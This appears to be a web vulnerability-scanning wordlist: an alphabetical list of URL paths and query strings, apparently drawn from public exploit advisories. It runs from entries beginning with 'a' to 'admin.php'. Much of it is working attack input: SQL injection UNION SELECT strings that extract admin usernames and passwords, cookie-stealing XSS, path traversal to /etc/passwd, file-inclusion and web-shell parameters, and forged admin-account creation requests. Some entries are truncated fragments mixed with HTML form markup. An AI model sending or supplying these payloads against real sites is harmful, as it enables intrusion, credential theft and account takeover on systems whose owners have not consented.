0b3291151174726fefa04cfaf43fd2bc.php
0b3291151174726fefa04cfaf43fd2bc.php?act=ls&d=%2Fetc%2Fvdomainaliases
a_affil.php?_REQUEST[read]=[EV!L]
download.php?file=./test
listdir.php?dir=./test
overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX[Sql injectio ]&isFromInfra=yes
AAIMConfigPage.class.php?base_path=[evil_scripts]
abbc.class.php? mosConfig_absolute_path=[attacker]
abbc.css.php?ABBC[Config][smileset]=..
abbc.css.php?design_path=..
abcdef2638blah.jpg.php?cmd=id
ab_gp_detail.php?id_det='><script>alert(document.cookie)<
ab_gp_detail.php?id_det=sql[N.A.S.T ]   
abitwhizzy.php?f=..
about.php?_WEBCAF[db_database]=asfa%22;id%3E
about_us.php?BuyerID=-31%20union
about_us.php?gid=0'%20union%20select%201,concat(username,0x2f,password),3%20from%20mgr_users%20
accept-signups_submit.php?email=clshack<script>alert(String.fromCharCode(72,
acces_log
access_log.php?order1='SQL'a.time+DESC&order2='SQL'a.time+DESC
accompagnants.class.php?path_om=[Shell]
account.asp
Account.asp
account-autos.html
account-ce.php?id=1&
account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes
accounting.php?cID=USERID&action=save" method="post" name="main" enctype="multipart
account-login.php?returnto[]
account_manage.php
accountmgr
accountnew2.asp
account.php?language=[LFI]
account-recover.php
accounts
Accounts
accounts&action2=searchaccounts&accounts_group=2
accounts&action2=searchaccounts&accounts_group=2&action=editaccount&accounts_lastname=&accounts_email=&accounts_group=2&account_key=<account_key>
accountsettings_add.html?id=[sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accontid=[arbitary_text]
accountsettings_add.html?id=[sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[any text with special characters]
accountsettings.html->Add->&#8221;Account name&#8221;,&#8221;Incoming mail server&#8221;,&#8221;User name&#8221; = <script>alert(document.cookie) <
account-signup.php?invite_row=1
account_signup.php [POST] 
AccountsPage.class.php?base_path=[evil_scripts]
accounts?role_id=1&username=hax0r&userpassword=test123&userpassword2=test123&create=Create
accountupd.asp?keyid=1%20having%201=1
accsess
accstatistics
accstatistics.html
acct-date.php?orderBy=[SQLi]
acct-date.php?username=[SQLi] etc
acct-ipaddress.php?ipaddress=[SQLi]
acct-ipaddress.php?orderBy=[SQLi]
acesef
acg-news-sql-injection.html
acgnews.uw.hu
acg-ptp
acgshop
acgv.free.fr
ACGVnews
achat
achievement_securityalert
achievo
achievo-1.4.2
achievo-1.4.5
 - Achievo is a flexible web-based resource management tool for business environments. Achievo's resource management capabilities will enable organisations to support their business processes in a simple, but effective manner.
acid
[ACID_path]
acidr00t.free.fr
acid-root.new.fr
acl
acm2000.mdb
acme
acollab
acomponents
a-conman
acontent
AContent
a-cool-debate.html
acp
[ac_path]
acp_lcxbbportal.php?phpbb_root_path=[evilcode]
acrobat.gif+onload=alert(213771818860)>&sid=8207c6aca4d21740c20f51527ccb3f7a
acrotxt.php?show=[SQL]
actb.php
/?act=export&id=..
action
/?action=browse&path=%2Fdevelopment%2Ftrunk%2Fcomponents%2Fcom_search%2Fviews%2Fsearch%2Fview.php&r1=7455&r2=7456
/?Action=Cat&ID=40%20and%201=0 false
/?Action=Cat&ID=40%20and%201=1 true
action.class.php?path_om=[Shell]
/?action=collection.imageview&id=643635 union all select iaimage.id, iaimage.name, description, iaimage.collection_id, iaimage.domain_id, password As path, access, visits, checked FROM iaimage, iauser WHERE iaimage.id=411 
/?action=compose
/?action=detail&gameid=1+union+select+1,2,3,4,5,nick,
/?action=details&cat=Content%20Management&id=2472658093
/?action=details&cat=Content%20Management&id=2579678051
/?action=details&cat=Guestbooks&id=11873094083
/?action=details&cat=Miscellaneous&id=1193932045
/?action=details&cat=Music%20Libraries&id=1190620143
/?action=details&cat=News%20Publishing&id=1194243816
/?action=details&cat=News%20Publishing&id=1898312927
/?action=details&cat=News%20Publishing&id=2154687026
/?action=details&cat=Polls%20and%20Voting&id=1193942206
/?action=disppro&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13+FROM+admin--
/?action=disppro&pid=[SQL Injection]
/?action=download&download=16
/?action=download&id=131
/?action=fileman&dir=
/?action=fileman&dir=backup
/?action=fileman&dir=razor_temp_logs
/?action=filemanview&dir=
/?action=filemanview&dir=backup
/?action=filemanview&dir=razor_temp_logs
/?action=FrsReleaseBrowse&frs_package_id=214
/?action=FrsReleaseBrowse&frs_package_id=3882
/?action=FrsReleaseView&release_id=9191
/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username%20FROM%20be_users%20WHERE%20uid=1
/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username,null%20FROM%20be_users%20WHERE%201
/?action=goto&topic_id=test--2009-01-30#topic
/?[action here, example: output]&
/?action=language&language=..
/?action=[LFI]
/?action=login
/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,login,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+FROM+user+WHERE+id=1
/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,version(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
/?action=login&submit=Login&returnurl=index.php
/?action=newaccount" % target
/?action=newtopic&idcat=[number]
action.php?delete=asdf&blogUrl=asdf&abspath=RFI
action.php HTTP
action.php?sShare=guest&sAction=
/?action=playgame&id=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile--
/?action=process&task=admin_article&id=2" method="post" name="main" >
/?action=process&task=save_settings" method="post" name="main" >
&action=profile&fileget=..
/?action=profile&user=admin
/?action=profile&user= [ Name Of user ]
/?action=pro_show&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6+FROM+admin--
/?action=pro_show&pid=[SQL Injection]
/?action=register
/?action=resetpass&key=-1%27+UNION+ALL+SELECT+1,concat(client_id,0x3A3A3A,client_pw),3,4,5,6,7,8,9,10,11+FROM+ADMINS+WHERE+id=1%23
/?action=resetpass&key=-1%27+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11%23
/?action=retrieve&frmEmail=111-222-1933email@address.tst&frmQuestion=1'[SQLI]&frmAnswer=111-222-1933email@address.tst&submitted=retrieve  
actions
actions_admin
/?action="><script>alert(0)<
/?action=search
/?action=showcat&idcat=[SQL]
/?action=showcats&unpub=true&slabID=2&catname=sidebar">
/?action=show&id=97
actionspages
actions.php?act=27&do=lang&lang=..
actions.php?host= [your command]
actions.php in
actions.php" method=post enctype="multipart
actions.php?module=[SHeLL]
actions.php POST="abspath=RFI"
/?action=[SQL] 
/?action=switchto_editmode
/?action=top&show=5&type=[sql] 
/?action=TrackerItemEdit&tracker_item_id=24288
/?action=TrackerItemEdit&tracker_item_id=24289
/?action=upload
/?action=verify&categorize=php&subaction=php&context=php&ID=75&verify=0
/?action=view&fileget=-1' UNION ALL SELECT 'evil_code',2,3,4,5,6,7 INTO OUTFILE '
/?action=viewgallery&type=album&aid=&page=-1[SQL]
/?action=vote&Browse=-1+union+select+1,@@version--
activate
activate.inc.php?install_root=[Shell]
activatemember?activatecode=%22%3Cscript%3Ealert(document.cookie)%3C
activate" method="post">
activate.php?code=1111111111111111111111111'+OR+user_id='2
activate.php?userName='
activateuser.php?language=..
active
activebids
activecontent.php?vsDragonRootPath=[evil_code?]
activeden.net
activekb
active.php
activiteiten.php?id=91 and 1=1--
activiteiten.php?id=91 and 1=2--
activiteiten.php?id=[SQLi]
activity
activity_log.php?gfplugins=[Shell]
activity_log.php?startid=' 
activity_log.php?startid=%2527
activity_log.php?startid=%27
activity.php?gfplugins=[Shell]
/?act=mod&f=1&CODE=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(16)%20--%20skip%20&auth_key=040c4a6e768d626b4c05a4bb0fbf315c
act_newsletter.php?i=V:target@example.com:<script>alert(document.cookie)<
act_newsletter.php?text=<script>alert(document.cookie)<
/?act=SR&f='><script>alert(document.cookie)<
/?act=story_lists&task=item&link_id=1'
/?act=story_lists&task=item&link_id=[SQLi]
Actualites
/?act=&x=52&y=16&md5=','','Le Plain Text de <b>\w{32}<
Acura
ad
ad526.html
ad6c74_ch9.php
AD747_CONFIG%20where
adaptbb
adaptcms
AdaptCMS%20Lite%20v1
AdaptCMS_Lite_1.4_2
adaptweb.sourceforge.net
adboard
adboard.php
adbrite-clone
adclick.php?bannerid=-
adclick.php?bannerid=-1+union+select+concat_ws
ad_click.php?bid=2 SQL Injection Code
add
add ">
add">
Add%20User" method="post">
addaccomtypeavailability.php
addaccomtypeavailability.php?id=72[BLIND SQL-INJECTION]
addaccomtypeavailability.php?id=[CROSS SITE SCRIPTING]&postsearch=S&cmbSearch=&page=1&txtkey=
addadminmembercode.php" onSubmit="return validate(this);">
addad.php" method="POST" >
add_album.php
addalink
[addalink-path]
addanad
add_banner.php
add_banner.php?nBId=[CROSS SITE SCRIPTING]&page=1
add_bid.inc.php?install_root=[Shell]
addbioform.php?root_path=[evil script]
add_block.php
add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C
add_category.php
add-category.php HTTP
add_cat.php">
add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C
addclientlocations.php?id=23[BLIND SQL-INJECTION]
add_comment.php?id=[SQL] 
addComment.php?stat=stat&type=t&category_id=9&topic_id=-122
addComment.php?topic_id=[sql]
add_comments.php?row_y5_site_configuration[templates_folder]=[EV!L]
addcontentitem">
add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C
addcustomers.php
addcustomers.php?id=65[BLIND SQL-INJECTION]
add-edit
add_edit_issue.php?issue=0+union
add_edit_issue.php?issue=0+union+select+null,null,null,@@version,system_user(),database(),user(),null,null,null,null,null,null,null,null,null,null,null,null--
addedit-render.php?editform=..
add_entr.php?gfplugins=[Shell]
addentry.php
add_entry.php?gfplugins=[Shell]
ad_detail.php?id=-9999+union+select+1,2,3,4,concat(email,char(58),password),version(),7,8,9,10,11,12,13,14,15,16,17,18,19+from+user--
ad_detail.php?id=null union select 1,2,3,4,concat(email,0x3a,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user--
addevent.tpl.php?CFG[skin]=..
addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=0&vc=1&fpart=1&what=showflat 
addfliersform.php?root_path=[evil script]
add_forms
addfriend
addgeneraldata">
addgenmerchform.php?root_path=[evil script]
add_group
add.html?type=[BSQLi]
add_images.php
addinterviewsform.php?root_path=[evil script]
AddInvoicePage.class.php?base_path=[evil_scripts]
AddIPAddressPage.class.php?base_path=[evil_scripts]
additionalfeatures.php
addlinksform.php?root_path=[evil script]
addlist.php
addlocationphotos.php
add_logo.php
addlyricsform.php?root_path=[evil script]
add_main_pages.php
add_member.php">
addmembioform.php?root_path=[evil script]
addmenu">
add_menu.php
addmerchform.php?root_path=[evil script]
addmerchpicform.php?root_path=[evil script]
addmessage2.asp?id=179
add" method="post">
add" method="post" name="main">
add-modify.php?installed_config_file=[Evil Script]
add_move.php?GLOBALS[g_campsiteDir]=[SHELL]
addnewdatafield">
addnewgig.php
addnewsform.php?root_path=[evil script]
add_news.php   
add_news.php?nid=[CROSS SITE SCRIPTING]&page=1
addnewtype">
addnewuserfield">
add_note.php">  
addon
addondb
addon_keywordreplacer.php?pathToFiles=[Evil_Script]
addon.php?date='"><script>alert(document.cookie)<
addon.php?date=[SQLi]
addons
add-ons
Addons
addons.mozilla.org
add_ons.php?add_ons=[SQL injection]
addpackages.php  
addpackages.php?id=5+AND+1=2[BLIND SQL-INJECTION]
addpackages.php?id=5[BLIND SQL-INJECTION]
addpackages.php?id=5&postsearch=[CROSS SITE SCRIPTING]&cmbSearch=&page=1&txtkey=
addpackages.php?id=5&postsearch=S&cmbSearch=[CROSS SITE SCRIPTING]&page=1&txtkey=
addpackages.php?id=5&postsearch=S&cmbSearch=&page=1&txtkey=[CROSS SITE SCRIPTING]
addpackages.php?id=5&postsearch=S&cmbSearch=&page=[CROSS SITE SCRIPTING]&txtkey=
addpackages.php?id=[CROSS SITE SCRIPTING]
AddPaymentPage.class.php?base_path=[evil_scripts]
addphotosform.php?root_path=[evil script]
add.php?first=HOVER%20ME!%22%20onMouseOver=%22alert('foo');
add.php?format_menue=[[Sh3LL
add.php?forumid=|almaster
add.php?forumid=[SQL Injection]
add.php?GLOBALS[g_campsiteDir]=[SHELL]
add.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
add.php?lang=..
add.php?language[ENTER_ARTICLE_BODY]=");}}--><
add.php?language[ENTER_ARTICLE_HEADER]=");}}--><
add.php?language[ENTER_ARTICLE_TITLE]=");}}--><
add.php?language[SPECIFY_ZONE]=");}}--><
add.php?last_message=<script>alert(1)<
add.php" method="post" class="">
add.php?mosConfig_absolute_path=[evilcode]
add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(42)%3C
add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4
add.php *Register
add.php?theme_dir=..
add.pro.php (Creat new Prodect and Upload Ev!l)
add_rating.php?id=[Blind SQL Injection]
addrbook.php?action=edit&addr_id='[SQL] 
add-recipe.html
add_recipe.php
addreleaseform.php?root_path=[evil script]
addreleasepicform.php?root_path=[evil script]
addrelmerchform.php?root_path=[evil script]
address
address_add
addressbook
address_book
address-book-25
address_book.php
addressbook.php"> 
addressbook.php?address=1
addressbook.php?basedir= [sh3ll inj3ct0r]
addressbook.update.phpcmd=remove&contactgroupid=1%20--%20");phpinfo();@ob_start("&submit=1&contactcheck[]=1&con
addressbookv7.0.0
address:port
addreview
add_review.htm?isbn=0553278223&node="><script>alert(document.cookie)<
add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C
add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C
add_review.htm?node=index&isbn=\\"><script>alert(document.cookie)<
addreview.php?id=">
add_review.php?id=B00004TXJV&lang=invalid..
addreview.php?id="><marquee><font color=Blue size=15>XroGuE<
addreviewsform.php?root_path=[evil script]
addsale.php?type=[Sqli]
addScrapbook
addshowsform.php?root_path=[evil script]
add-site.php?do=addnew&go=add
addspecialoffer.php?id=4'[BLIND SQL-INJECTION]
addspecialoffer.php?id=4[BLIND SQL-INJECTION]
add_story.php" method="post" name="main">
add-subject.php?Success=1
add_task.php?gfwww=[Shell]
AddTaxRulePage.class.php?base_path=[evil_scripts]
add_tmsp.php?mosConfig_absolute_path=[evilcode]
add?token=true">
addtrack
addu.php
add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C
add_url.php?art=1'+union+select+concat(user(),0x3a,database())
add_url.php?art=[SQL]
adduser">
addusergroup">
adduser" onsubmit="forge()">
add_user.php
add_user.php">
adduser.php">
adduser.php" method="post">
adduser.php?mode=Add
adduser.php?real_name=null&user_name=[user]&password=[pass]&level=10&email=null@null.com&website=null&misc=null
add_user.php" style="width:400px">
add_users.php?user_loginname=HACK_USER&user_password=HACK_USER&user_real_name=real&user_email=os@so.net&user_permissions=3&user_added_by=1&user_lastmod_by=1&user_allow=1
addwearmerchform.php?root_path=[evil script]
addyoursite.php?catid=<Script>JavaScript:alert('test');<
adek.org
adhoc2.jsp
adisplay.php?lang=..
adisplay.php?lang=shell
adjuncts.add-edit.php
adjuncts.list.php
adjuncts.recipe.php
adm
ADM=1
adm&adm=1" >
adMan
adMan1
Ad_Management
ad-manager
admanager4
admanager4.php
admanagerpro
ad-manager-pro
adManArea
adManPricing.php
admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]
adm_config
adm_config_set.php?user_id=0&project_id=0
admidio
admidio-2.3.5
admin
 admin
_admin
/?admin
[admin]
\admin\
admin 
admin                  
admin                                             ||    
admin\
admin#
Admin
ADMIN
 admin 0
admin%00
admin=0x59
 admin 1
admin=1
admin108
admin1953.php
admin1_configuration.php?gid=1&id=36&action=save"  class="form">
admin1_members.php?action=member_new&page=1&mID=1 ">
admin1_members.php?action=member_new&page=1&mID=1"  class="form">
admin_21232f297a57a5a743894a0e4a801fc3
 admin2 toto\n";exit;
admin:5f4dcc3b5aa765d61d8327deb882cf99
admin_access
admin_ac.php?action=cp" method="POST">
admin_acronyms.php?mode=edit&id=-1%20UNION%20SELECT%20null,user_password,null%20FROM%20phpbb_users%20where%20user_id=2&sid=AdminHash
adminaddeditdetails.php?adduser" onsubmit="return editvalidateform();">
adminadd.php">
admin_add.php method=post
admin_add.php" method="post">
admin.admin-copy_module.php?mosConfig_absolute_path=shell
 -admin admin:passw0rd\n";
admin_admin.php" name="record" method="POST">
admin-ajax.php';
admin-ajax.php">
admin-ajax.php?action=foxypress_download&security=844b64ce45" method="post" enctype="multipart
admin-ajax.php?action=spiderbigcalendarrr&calendar_id=";><script>alert(123);<
admin-ajax.php?action=spiderbigcalendarrr&eventID=";><script>alert(123);<
admin-ajax.php?action=spiderbigcalendarrr&ev_ids=";><script>alert(123);<
admin-ajax.php?action=spiderbigcalendarrr&theme_id=";><script>alert(123);<
admin-ajax.php?action=spiderboxjsphp&allImagesQ=<
admin-ajax.php?action=spiderboxjsphp&darkBG=<
admin-ajax.php?action=spiderboxjsphp&delay=<
admin-ajax.php?action=spiderboxjsphp&juriroot=<
admin-ajax.php?action=spiderboxjsphp&slideShowQ=<
admin-ajax.php?action=spiderboxjsphp&spiderShop=<
admin-ajax.php?action=spidercalendarinlineedit"; method="post">
admin-ajax.php?action=spidercalendarinlineupdate"; method="post">
admin-ajax.php?action=spiderseemore&date[]
admin-ajax.php?action=upm_ayax_polls_result&do=result&post=1&type=general&PID=2and
admin-ajax.php" method="POST">
admin_album_otf.php?phpbb_root_path=Shell?
admin-aps
admin_area
admin-area-specifications.html
admin.asp
adminAttachments.php?GlobalSettings[templatesDirectory]=[evil_script]
admin_avatar.php?phpbb_root_path=[evil_scripts]
adminAvatars.php?GlobalSettings[templatesDirectory]=[evil_script]
adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[evil_script]
admin_backup.php
admin_bady.html?action=setting
admin_balance.inc.php?install_root=[Shell]
adminBanned.php?GlobalSettings[templatesDirectory]=[evil_script]
adminbereich
admin_board.php?phpbb_root_path=[evil_scripts]
admin_board.php?sid='.$1;
admin_board.php?sid=".$session_id."\r\n";
adminBoards.php?GlobalSettings[templatesDirectory]=[evil_script]
adminbot
[adminbot_path]
admin_catalog.php?action=edit&id=-2+union+select+concat(user
admin_cats.php?CONFIG[main_path]=[evil_scripts]
admincenter
admin.cgi
admin.cmd.php?GLOBALS=[Evil Script]
admin-comments.php?ndeleted=1<script>alert(123);<
admin-comments.php?sedit=1&ndeleted=<script>alert(123);<
admincontrol
admincp
admincpanel
admincp.php)
admin.css%00
admindatabase.php
admin_db_utilities.php?phpbb_root_path=[evil_scripts]
admin_db_utilities.php?sid=";
admindel.php?action=delete&mode=question&qno=<NUM>&ano=<NUM>
admin-delreq.php?categ=waraxe
admindemo
admin_details.php" method="post">
 --admindir 
admin_disallow.php?phpbb_root_path=[evil_scripts]
admin_editor.php',@auth); 
admin_editor.php" method="post" name="form">
admin_edit.php?CONFIG[main_path]=[evil_scripts]
admin_edit.php" method="post" name="main">
admin.edit.user.php?id=1
admineventdetails.php
admineventlist.php
admineventtype.php
admin_extensions_add.php" ENCTYPE="multipart
admin&file=panel
adminfiles
admin-files
admin_forumauth.php?phpbb_root_path=[evil_scripts]
admin_forum_prune.php?phpbb_root_path=[evil_scripts]
admin_forums.php?");
admin_forums.php");
adminForums.php?GlobalSettings[templatesDirectory]=[evil_script]
admin_forums.php?phpbb_root_path=[evil_scripts]
admin_fotos.php?id_tipo=0&id_relacionado=0&nombre=Novedades
admin_frame.php?ltarget=[LOCAL FILE]%00
Admin-functions.php
Admin-functions.php?ss_uri=..
admin_gambar.php
 -admin god:pwd\n";
admin.googlebase.php?mosConfig_absolute_path=[evilcode]
admin_groups.php?phpbb_root_path=[evil_scripts]
admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash
admin_handler.php?gfplugins=[Shell]
adminHandler.php?load_section=product&pg=overview&parentNode=_pnl1345421066692_7751&edit_id=6&gridHandle=productgridForm&edit_id=6&save=true">
admin_ha.php?gfplugins=[Shell]
 admin_hash
      admin_hash\n";
admin_header_album.php?global_lang=[LFI]%00
admin_header_blog.php?global_lang=[LFI]%00
admin_header_group.php?global_lang=[LFI]%00
adminheader.inc.php?path=[evil_scripts]
AdminHelp.php?helpFileName=a
adminhelp.php?Setting[OPT_includepath]=[-Sh3ll-]
admin.home.php
adminhome.php
adminhome.php?gfplugins=[Shell]
adminhome.php?pg=1&msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C
adminhom.php?gfplugins=[Shell]
admi'n.html
admin.html
/?Admin_ID=Admin' UNION ALL SELECT
admin_import.php?CONFIG[main_path]=[evil_scripts]
admin.incl.php?Setting[OPT_includepath]=[-Sh3ll-]
admin_includes
admin.inc.php
admin_index
adminindex.php
adminindex.php?action=user.home
admin_info
administration
Administration
administration.php?page=projet_contribution&id_contribution=-1
administration.php?page=projet_contribution&id_contribution=[SQL]
administrator
administratorji
administrators_add.php">
administrators.php
administrators.php?adm_mode=update&adm_rid=-1&adm_sort_field=6&adm_sort_type=ASC&adm_page_size=1&adm_p=1&adm_new=1'>Create<
administrators.php" method="POST">
administrators.php?mode=new" method="post">
administre2.php?id_user=-1%20UNION%20SELECT%20null,passe,null,null%20FROM%20connect_upload_fichier%20WHERE%20id_user=1
administrer
admin.joom12pic.php?mosConfig_live_site=[attacker]
admin.joomlaflashfun.php?mosConfig_live_site=[attacker]
admin.jwmmxtd.php?mosConfig_absolute_path= [inj3ct0r]
admin?lang=
adminleaderslist.php
admin.link.modify.php?id=-6%20UNION%20SELECT%201,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9--
admin_log_cp--
adminlogin
adminLogin.asp">
admin_login.php
adminlogin.php
adminLogin.php?config[forum_installed]=[evilc0de]
admin.login.php?go=1"
admin_login.php?loginerror=<script>alert(document.cookie)<
adminlog.php?valid_login=1&loggedInUser=[VALIDUSER]
admin_main.asp
admin.manage.users.php
admin map(expect login.php): include('protection.php')
admin_mass_email.php?phpbb_root_path=[evil_scripts]
admin_members.php?a".
admin&messageid=20040801&index=3&folder=inbox
admin_modif_categorie.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2 from infos--
admin_modif_partenaire.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6 from infos--
admin_modif.php?lang=
admin_modify_comment.php?uid=1
admin_module.php?g_admin_rep=..
admin_modules
[admin_name]%00 
[adminname].php%00
admin_nav.inc.php
admin_new
admin_options.php">
adminpanel
 (Admin Panel)
[adminpanel_path]
adminpanel.php?action=albumgallery
adminpanel.php?action=artistgallery
admin.panoramic.php?mosConfig_live_site=[evilcode]
adminpass.php" method="POST">
adminpass_submit.php" method="post">
 admin passwd";
[admin_path]
[admin_Path]
admin.php
admin.php 
admin.php   
admin.php                                                                                
admin.php :)
admin.php';
admin.php"
admin.php">
admin.php";
admin.php");
admin.php)
Admin.php',[
ADMIN.php
admin.php3
admin.php",3);
admin.php3?admin=any_data
admin.php3?From=admin.php3&What=
admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=
admin.php3?From=admin.php3&What=Body&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=[FILE]%00
admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=1
admin.php3?PHP_AUTH_USER=boogieman
admin.php3?step=4&option=pass&confirm=flow&newPssword=flow
admin.php?a=..
admin.php?act=
admin.php?act=..
admin.php?act=comments&orderType=[ASC
admin.php?act=comments&orderType=[CROSS SITE
admin.php?act=comments&orderType=[SQL-INJECTION]
admin.php?action=..
admin.php?action=add_blog" method="post">
admin.php?action=add_user&blog" method="post">
admin.php?action=add_user" method="post">
admin.php?action=add_user_process",
admin.php?action=admin_opt"
admin.php?action=admin_opt" method="post">
admin.php?action=approve_comment&id=[ID]&do=add
admin.php?action=bbcodes&job=censor
admin.php?action=categories&do=delete&op=[ID]
admin.php?action=change_password"
admin.php?action=config&en_login_id=0
admin.php?action=confirm"
admin.php?action=delete&id=[ID]
admin.php?action=delete&id=[ID]"
admin.php?action=designs&job=templates_file_delete&dir="<s
admin.php?action=designs&job=templates_file_edit2&dir="<sc
admin.php?action=designs&job=templates_file_history&file=<
admin.php?action=designs&job=templates_file_revert&dir="<s
admin.php?action=editconfig
admin.php?action=editop&id=1
admin.php?action=edit_user&id=1" method="post">
admin.php?action=edituser&id=2" enctype="multipart
admin.php?action=email&do=true"
admin.php?action=explorer&job=chmod&path="<script>alert("
admin.php?action=explorer&job=newdir&path="<script>alert("
admin.php?action=full&id=-1 union select 1,2,3,4,5
admin.php?action=[LFI]
admin.php?action=liste_pages&del=[page id]" alt="Do you see this?" 
admin.php?action=liste_user&del=[user id]" alt="Do you see this?" 
admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
admin.php?action=login&page=home&script=index.php&env=..
admin.php?action=login&page=home&script=index.php&env=[Directory]
admin.php?action=login&page=home&script=index.php&env=!!!Owned!!!
admin.php?action=logout&page=home&env=data
admin.php?action=manage&do=delete&uid=[USER
admin.php?action=newsletter"
admin.php?action=np (2 Upload)
admin.php?action=options&mod=accounts&create=new">
admin.php?action=phpinfo
admin.php?action=report_statistics&report=visitors&list_from=[SQL-Injection] 
admin.php?action=setconfig
admin.php?action=users&en_login_id=0
admin.php?action=view&do=delete&id=[ID]
admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list
admin.php?action=viewticket&id=498+union+select+1,version(),3,4,user(),6,database(),8,9,10,11,12--
admin.php?action=viewticket&id=[ SQL CODE]
admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~">&lt;
admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~">&lt;
admin.php?activatebanner&id=-1%20[SQLi] 
admin.php?activateuser&deleteuser='+[SQL] 
admin.php?activateuser&id='+[SQL] 
admin.php?act=[ LFI ]%00
admin.php?act=news&orderType=[ASC
admin.php?act=news&orderType=`[CROSS SITE SCRIPTING]
admin.php?act=news&orderType=[CROSS SITE SCRIPTING]]&search=&orderBy=[CROSS SITE SCRIPTING]
admin.php?act=<script>alert("Found by the Corelan Security Team")<
admin.php?act=topic_options
admin.php?act=view_log
admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
admin.php?ADD=3&user=someuser{HTPP}
admin.php?admin=%22 will produce a message:
admin.php?admin=J3VuaW9uIHNlbGVjdCAncGFzc3dvcmQnLyogOnBhc3N3b3Jk
admin.php?adminmodule=media&task=deletefile&dir=&file=index.html" alt="Do you see this?" 
admin.php?adminmodule=user" method="post" >
admin.php?adminmodule=user&task=deleteuser&id=2" alt="Do you see this?" 
admin.php?adminpy=1 
admin.php?adsess='><script>window.open
admin.php?area=users&ampview=default&action=create" method="post">
admin.php?a=users&edit=1">
admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--
admin.php?a=users&id="><script>alert()<
admin.php?a=users&id=[SQL]
admin.php?a=view&id=-99%20UNION%20SELECT%20username,password,0,0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201
admin.php?a=view&id=-99%20UNION%20SELECT%20username,password,'your@email.org',0,0,0,0,0,0,0,0%20FROM%20ticket_reps%20WHERE%201
admin.php?bit=..
admin.php?_class=..
admin.php?com_option=users&task=create&user_id=&user_name=toxiclove&user_username=echo&user_email=skk%40sk.pl&user_gid=5&user_password=test1"
admin.php?config[fsBase]=[evil_scripts]
admin.php?cont=edit_usergroup&id=1
admin.php?cont=new_nas
admin.php?cont=store_nas
admin.php?cont=update_usergroup&id=1
admin.php?cp=bckup";
admin.php?ctrl=users&user_ID=0&&action=userupdate">  <!-- >> edit the action -->
admin.php?delete=..
admin.php?deletebanner&id=-1+[SQL] 
admin.php?delete=[ID]
admin.php?delete=[path]
admin.php?deleteunuser&id='+[SQL] 
admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
admin.php?deleteuserbanner&deleteuserbanner='+[SQL] 
admin.php?do=mods&aktion=install&datei=..
admin.php?edit=1
admin.php?edit=2[SQL-INJECTION!]
admin.php?env_dir=shell
admin.php?fct=users&selgroups=[Blind Sqli]
admin.php?f=list_user&uname=test&ulevel=1 
admin.php?from="><script>          #
admin.php?func=add',{'pwdUser':'aaaa','pwdEmail':'aa%40sss.com','pwdPwd1':'123','pwdPwd2':'123','pwdEdit':'on','pwdRestricted':'1910-01-01','pwdStyle':'default','Create':'Submit+Query'});
admin.php?func=ged
admin.php?gbgo=edit&id=8
admin.php?gbgo=edit&id=-999%20union%20select%200,passwort,0,mail,mail,mail,mail,0,0,passwort%20from%20dnguestbook_user
admin.php?gfplugins=[Shell]
admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users
admin.php?_htmlfile=..
